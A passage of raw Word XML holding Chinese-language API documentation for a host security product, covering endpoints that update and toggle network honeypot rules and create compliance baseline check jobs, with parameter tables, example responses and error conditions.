            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27E9DA4D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="516878E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1888EDF1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07911365" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63A1BA65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E789114" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="026284AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口状态，含义如下：-1:同步行中 1:同步成功 0:同步失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="581CEB27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68761547" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151B2408" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>帐号没有权限，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D41F536" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="175" w:name="更新单条规则"/>
      <w:bookmarkEnd w:id="174"/>
      <w:r>
        <w:t>更新单条规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7668FC32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐更新主机规则功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349FF35D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77481185" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>PUT /external/api/detect/honeypot/{linux,win}/rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D51A3F"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954"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3382"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="54B9587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45CB156" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="530C10E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10F12D89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F6C9C6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06719A3E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65838B6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02887EF0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="497A625A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="771BF421" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1150F0B0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F36E090" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0751DC51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A7DC765" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="765761D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口列表（端口个数不能超过5个）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="692E4E5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3080B84D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/honeypot/linux/rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552B2123" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A31A46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7633D21B"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497C54" w14:paraId="0E11F46B"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D105E8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38083418" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DC353A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="396C62AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="21C91023" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61DA6C7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1380B30E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B61EA0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="065C6631" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="397CDA3E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CD59F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则主机不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3200F940" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A66DFA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>帐号没有权限，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E9D27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则同步中不能更新，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFF9D55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则禁用状态不能更新，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B43C09C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>端口参数为空，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21410EE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>端口数量大于5，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E52229" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="176" w:name="开关单条规则"/>
      <w:bookmarkEnd w:id="175"/>
      <w:r>
        <w:t>开关单条规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5C56DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐开启/关闭主机规则功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7D1934" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533CAD37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>PUT /external/api/detect/honeypot/{linux,win}/rule/enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CE0234"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954"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="2467"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5B46C1B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F375BF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19CFA265" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D95AEBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="025D95C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="436F3EA5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44825097" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="565A89CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A6521E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44D1E5F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="438968CC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DC30F98" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F39F0EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CDC31C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="366E60EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则状态，0:开启 1:关闭</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="098627E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB4F7C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/honeypot/linux/rule/enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B922546" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ACA6B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A840AAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369A6D09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则主机不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D55BDB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C38AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>帐号没有权限，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F70FDB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>状态参数不合法，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4227F137" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="177" w:name="合规基线"/>
      <w:bookmarkEnd w:id="133"/>
      <w:bookmarkEnd w:id="167"/>
      <w:bookmarkEnd w:id="176"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>合规基线</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115DAEB7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>基线检查提供基线检查项在所有主机中的检查结果，即可查询某一个检查项，也可查询某个主机IP的结果，请根据需要选择。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52044CE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="178" w:name="新建任务"/>
      <w:r>
        <w:t>新建任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A069954" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A34DE78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/baseline/job/{linux，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194768DA"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423"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="4777"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="27E919C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38E4311" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63AFD524" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B90AA7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6809BF92" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="348FEE0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10ABFFA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="317B7379" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务名，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="40283E61" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59074357" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>kind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06AF51C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EDFF0DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必填，范围类型 0-主机 1-业务组 2-全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
